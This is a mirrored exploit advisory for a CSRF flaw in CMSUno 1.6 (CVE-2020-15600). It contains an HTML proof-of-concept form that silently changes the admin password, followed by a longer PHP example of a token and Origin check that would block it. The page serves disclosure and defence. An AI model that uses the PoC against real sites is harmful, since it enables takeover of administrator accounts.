Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023090053

Below is a copy:

CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)
# Exploit Title: CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)
# Date: 2020-07-22
# Exploit Author: Gh05t666include (AnonGhost Indonesia) 
# Vendor Homepage: https://github.com/boiteasite/cmsuno
# Software Link: https://github.com/boiteasite/cmsuno
# Version: v1.6
# CVE : 2020-15600

An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password.

PoC:

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/cmsuno-master/uno.php" method="POST">
<input type="hidden" name="user" value="admin" />
<input type="hidden" name="pass" value="yourpassword" />
<input type="submit" name="user" value="Submit request" />
</form>
</body>
</html>
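
The form above is accepted because the request carries nothing that a page on another site could not supply. The following added example (not CMSUno's code and not the vendor's 1.6.1 fix) shows a per-session token check plus an Origin comparison that would reject it; the function names and the `csrf` field are hypothetical, and only the `user` and `pass` parameter names come from the PoC.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers for illustration; not taken from CMSUno.
function csrf_token(array &$session): string
{
    // One unpredictable token per session, emitted as a hidden field
    // in every state-changing form the application itself renders.
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

function csrf_check(array $session, array $post, array $server): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;                       // state changes only via POST
    }
    $expected = $session['csrf'] ?? '';
    $given    = $post['csrf'] ?? '';
    if ($expected === '' || !is_string($given) || !hash_equals($expected, $given)) {
        return false;                       // token missing or wrong
    }
    // Defence in depth: when the browser sends Origin, it must match Host.
    if (isset($server['HTTP_ORIGIN'])) {
        $origin = preg_replace('#^https?://#', '', $server['HTTP_ORIGIN']);
        if ($origin !== ($server['HTTP_HOST'] ?? '')) {
            return false;
        }
    }
    return true;
}

// Constructed sample requests (not captured traffic).
$session = [];
$token   = csrf_token($session);
$forged  = ['user' => 'admin', 'pass' => 'x'];                    // cross-site form: no token
$genuine = ['user' => 'admin', 'pass' => 'x', 'csrf' => $token];  // form rendered by the app
$evil = ['REQUEST_METHOD' => 'POST', 'HTTP_HOST' => '127.0.0.1',
         'HTTP_ORIGIN' => 'http://attacker.example'];
$own  = ['REQUEST_METHOD' => 'POST', 'HTTP_HOST' => '127.0.0.1',
         'HTTP_ORIGIN' => 'http://127.0.0.1'];

var_dump(csrf_check($session, $forged, $evil));   // request shaped like the PoC
var_dump(csrf_check($session, $genuine, $own));   // request from the admin UI
```

In a real handler `$session`, `$post` and `$server` would be `$_SESSION`, `$_POST` and `$_SERVER`, and the password change would run only when the check returns true.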
